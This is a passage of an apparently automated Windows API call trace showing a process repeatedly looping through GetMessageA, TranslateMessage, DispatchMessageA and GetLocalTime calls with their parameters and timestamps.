lpMsg=0x2347a14) returned 1 [0105.281] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.281] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.281] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x17)) [0105.281] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x17)) [0105.281] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.292] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.292] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.292] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x20)) [0105.292] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x21)) [0105.292] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.313] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.313] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.313] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x36)) [0105.313] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x36)) [0105.313] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.323] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.323] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.323] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x40)) [0105.323] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x40)) [0105.323] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.344] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.344] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.344] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x55)) [0105.344] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x55)) [0105.344] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.355] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.355] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.355] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x60)) [0105.355] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x60)) [0105.355] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.380] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.380] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.380] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x79)) [0105.380] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x7a)) [0105.380] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.390] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.390] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.390] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x83)) [0105.390] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x83)) [0105.390] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.401] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.401] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.401] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x8e)) [0105.401] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x8f)) [0105.401] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.422] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.422] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.422] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0xa3)) [0105.422] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0xa3)) [0105.422] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.433] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.433] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.433] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0xae)) [0105.433] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0xae)) [0105.433] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.454] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.454] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.454] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0xc3)) [0105.454] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0xc3)) [0105.454] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.466] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.466] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.466] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0xcf)) [0105.466] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0xcf)) [0105.466] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.487] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.487] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.487] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0xe4)) [0105.487] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0xe4)) [0105.487] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.498] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.498] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.498] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0xf0)) [0105.498] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0xf0)) [0105.499] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.512] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.512] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.512] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0xfe)) [0105.512] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0xfe)) [0105.513] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.548] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.548] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.548] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x121)) [0105.548] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x121)) [0105.548] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.557] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.557] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.557] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x12a)) [0105.557] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x12b)) [0105.557] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.578] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.578] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.578] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x140)) [0105.578] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x140)) [0105.579] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.593] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.593] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.593] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x14e)) [0105.593] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x14e)) [0105.593] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.608] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.608] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.608] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x15d)) [0105.608] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x15d)) [0105.608] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.624] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.624] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.624] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x16d)) [0105.624] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x16d)) [0105.624] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.645] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.645] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.645] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x182)) [0105.645] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x182)) [0105.645] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.655] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.655] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.655] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x18c)) [0105.655] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x18c)) [0105.655] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.667] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.667] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.668] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x199)) [0105.668] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x199)) [0105.668] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.682] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.683] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.683] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x1a8)) [0105.683] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x1a8)) [0105.683] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.709] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.709] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.709] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x1c2)) [0105.709] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x1c2)) [0105.709] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.732] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.732] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.732] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x1da)) [0105.733] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x1da)) [0105.733] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.736] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.736] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.736] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x1dd)) [0105.736] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x1de)) [0105.736] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.778] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.778] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.778] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x207)) [0105.778] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x207)) [0105.778] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.797] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.797] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.797] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x21a)) [0105.797] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x21a)) [0105.797] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.808] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.808] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.808] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x225)) [0105.808] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x225)) [0105.808] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.829] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.829] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.829] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x23a)) [0105.829] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x23a)) [0105.829] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.840] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.840] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.840] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x245)) [0105.840] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x245)) [0105.840] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.896] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.896] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.896] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x27d)) [0105.896] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x27d)) [0105.896] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.905] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.905] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.905] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x286)) [0105.905] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x286)) [0105.905] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0105.921] TranslateMessage (lpMsg=0x2347a14) returned 0 [0105.921] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0105.921] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x23, wMilliseconds=0x297)) [0105.922] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, 